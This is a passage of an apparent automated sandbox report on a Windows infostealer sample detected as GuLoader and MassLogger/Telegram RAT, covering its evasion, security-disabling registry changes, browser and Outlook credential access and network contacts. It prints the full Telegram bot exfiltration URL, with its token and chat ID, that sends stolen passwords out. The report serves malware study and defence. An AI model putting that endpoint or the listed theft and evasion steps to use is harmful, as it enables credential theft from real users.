            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598655s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598436s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598326s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -598097s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -594516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_00402770 FindFirstFileW,3_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_0040622D FindFirstFileW,FindClose,3_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598436Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598326Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598097Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\4NG0guPiKA.exeJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Local\Temp\nst6786.tmpJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Jaskendes.Tin19Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Skankeben.PriJump to behavior
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI call chain: ExitProcess graph end nodegraph_0-4703
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI call chain: ExitProcess graph end nodegraph_0-4705
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Users\user\Desktop\4NG0guPiKA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disable Task Manager(disabletaskmgr)
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Disables CMD prompt
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeRegistry value created: DisableCMD 1Jump to behavior
            Disables the Windows task manager (taskmgr)
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		11
            Process Injection            		11
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		31
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets3
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            4NG0guPiKA.exe76%VirustotalBrowse
            4NG0guPiKA.exe63%ReversingLabsWin32.Trojan.GuLoader
            4NG0guPiKA.exe100%AviraHEUR/AGEN.1337946

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://api.telegram.orgHI0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.181.238
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.186.33
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.80.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.8.169
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.com4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332EB000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/bot4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://translate.google.com/translate_a/element.js4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgHI4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://reallyfreegeoip.org/xml/8.46.123.189ec4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=20654NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://reallyfreegeoip.org4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.org/~4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002B17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.org4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://apis.google.com4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.com4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_ErrorError4NG0guPiKA.exefalse
                                                            		high
                                                            http://api.telegram.org4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndn4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://reallyfreegeoip.org/xml/4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  132.226.8.169
                                                                  		checkip.dyndns.comUnited States
                                                                  		16989UTMEMUSfalse
                                                                  142.250.181.238
                                                                  		drive.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  149.154.167.220
                                                                  		api.telegram.orgUnited Kingdom
                                                                  		62041TELEGRAMRUfalse
                                                                  142.250.186.33
                                                                  		drive.usercontent.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  104.21.80.1
                                                                  		reallyfreegeoip.orgUnited States
                                                                  		13335CLOUDFLARENETUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588607
                                                                  Start date and time:2025-01-11 03:03:54 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 0s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
